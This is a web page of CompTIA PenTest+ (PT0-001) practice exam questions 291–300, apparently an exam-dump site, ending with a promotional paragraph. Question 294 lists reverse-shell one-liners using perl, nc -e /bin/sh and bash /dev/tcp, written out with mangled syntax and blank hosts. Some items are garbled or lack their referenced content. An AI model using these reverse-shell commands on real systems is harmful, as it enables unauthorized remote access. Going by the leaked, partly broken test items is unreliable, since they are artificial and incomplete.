Exam Details
Exam Code
:PT0-001Exam Name
:CompTIA PenTest+ ExamCertification
:CompTIA PenTest+Vendor
:CompTIATotal Questions
:306 Q&AsLast Updated
:Apr 01, 2024
CompTIA CompTIA PenTest+ PT0-001 Questions & Answers
-
Question 291:
A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to exploit this configuration setting?
A. Use path modification to escape the application's framework.
B. Create a frame that overlays the application.
C. Inject a malicious iframe containing JavaScript.
D. Pass an iframe attribute that is malicious.
-
Question 292:
After several attempts, an attacker was able to gain unauthorized access through a biometric sensor using the attacker's actual fingerprint without exploitation. Which of the following is the MOST likely explanation of what happened?
A. The biometric device is tuned more toward false positives
B. The biometric device is configured more toward true negatives
C. The biometric device is set to fail closed
D. The biometnc device duplicated a valid user's fingerpnnt.
-
Question 293:
A penetration tester identifies the following findings during an external vulnerability scan:
Which of the following attack strategies should be prioritized from the scan results above?
A. Obsolete software may contain exploitable components
B. Weak password management practices may be employed
C. Cryptographically weak protocols may be intercepted
D. Web server configurations may reveal sensitive information
-
Question 294:
A penetration tester compromises a system that has unrestricted network over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester mostly like use?
A. perl -e ` use SOCKET'; $i='
; $p='443; B. ssh superadmin@
-p 443 C. nc -e /bin/sh
443 D. bash -i >and /dev/tcp/
/ 443 0>and1 -
Question 295:
A penetration tester wants to target NETBIOS name service. Which of the following is the most likely command to exploit the NETBIOS name service?
A. arPspoof
B. nmap
C. responder
D. burpsuite
-
Question 296:
Which of the following types of physical security attacks does a mantrap mitigate-?
A. Lock picking
B. Impersonation
C. Shoulder surfing
D. Tailgating
-
Question 297:
An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?
A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test
-
Question 298:
Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?
A. ICS vendors are slow to implement adequate security controls.
B. ICS staff are not adequately trained to perform basic duties.
C. There is a scarcity of replacement equipment for critical devices.
D. There is a lack of compliance for ICS facilities.
-
Question 299:
Which of the following types of intrusion techniques is the use of an "under-the-door tool" during a physical security assessment an example of?
A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass
-
Question 300:
HOTSPOT
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
Hot Area:
Tips on How to Prepare for the Exams
Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.